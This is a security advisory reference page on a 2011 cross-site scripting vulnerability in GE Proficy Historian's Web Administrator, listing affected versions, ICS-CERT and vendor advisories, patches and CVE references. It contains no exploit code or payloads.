Home -> Resources -> SCADA/ICS Vulnerability Reference -> GE Proficy Historian

General Electric Intelligent Platforms (GE-IP) Proficy Historian Web Administrator Cross-Site Scripting (XSS) Vulnerability

November 1, 2011

Security researchers Billy Rios and Terry McCorkle have discovered a vulnerability within the General Electric Intelligent Platforms (GE-IP) Proficy Historian used with the Cimplicity and iFix software suites.

The vulnerability been reported in Proficy Historian can be exploited by malicious people to conduct cross-site scripting attacks and compromise a vulnerable system.

Certain unspecified input is not properly sanitised within the Web Administrator component before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Successful exploitation of this vulnerability may allow execution of arbitrary code.

All versions of Proficy Historian, Proficy HMI/SCADA-CIMPLICITY 8.1 and 8.2, and Proficy HMI/SCADA-iFIX 5.0 and 5.1 are vulnerable.

SCADAhacker comment:
Billy Rios and Terry McCorkle presented at DerbyCon 2011 a session entitled "100 Bugs in 100 Days: An Analysis of ICS (SCADA) Software". You can view the presentation by clicking here.

ICS-CERT Advisories / Alerts

ICSA-11-243-02

Additional related Advisories:
ICSA-11-243-01
ICSA-11-243-03

Vendor Website (include Patches / Hotfixes)

Proficy Security Advisory Information (GEIP11-01, GEIP11-02, GEIP11-03)
GEIP11-03: Security Advisory - Proficy Historian Web Administrator 
Vendor Homepage
GE-IP Automation and HMI/SCADA Product Information (includes trial DVD links)
Proficy Historian Product Information (includes free download)

Related links:
GEIP11-01: Security Advisory - Proficy Historian ihDataArchiver 
GEIP11-02: Security Advisory - Proficy Plant Applications services 
Patch: Proficy Plant Applications 5.0 SIM 43 (signon required)
Patch: Proficy Plant Applications 4.4.1 SIM v101 (signon required)
Patch: Proficy Historian 4.0 SIM 12 (signon required)
Patch: Proficy Historian 3.5 SIM 17 (signon required)
Patch: Proficy Historian 3.1 SIM IH31_11092015699 (signon required)

Exploit Proof-of-Concept

No public exploit is available at this time.

Common Vulnerability & Exposure (CVE) References

CVE-2011-3320
NVD CVE-2011-3320

Related references:
CVE-2011-1919
NVD CVE-2011-1919
CVE-2011-1918
NVD CVE-2011-1918

Additional Information

Open-Source Vulnerability Database #76767
Secunia Advisory #46699
Secunia Vulnerability Report and Statistics on Proficy Historian 3.x
Secunia Vulnerability Report and Statistics on Proficy Historian 4.x
Security Focus Vulnerability Info and Exploit Bugtraq ID 50473
Packet Storm Advisory #106515

GE Works to Fix Vulnerabilities (ISSSource)

Related information:
SCADAhacker Reference - GE-IP Proficy Plant Applications Buffer Overflow Vulnerabilities
SCADAhacker Reference - GE-IP Proficy Historian Data Archiver Buffer Overflow Vulnerability
Open-Source Vulnerability Database #76762
Open-Source Vulnerability Database #76763
Open-Source Vulnerability Database #76764
Open-Source Vulnerability Database #76765
Open-Source Vulnerability Database #76766
Secunia Advisory #46700
Secunia Vulnerability Report and Statistics on Proficy Plant Applications 4.x
Secunia Vulnerability Report and Statistics on Proficy Plant Applications 5.x
Security Focus Vulnerability Info and Exploit Bugtraq ID 50474
Security Focus Vulnerability Info and Exploit Bugtraq ID 50475
Packet Storm Advisory #106517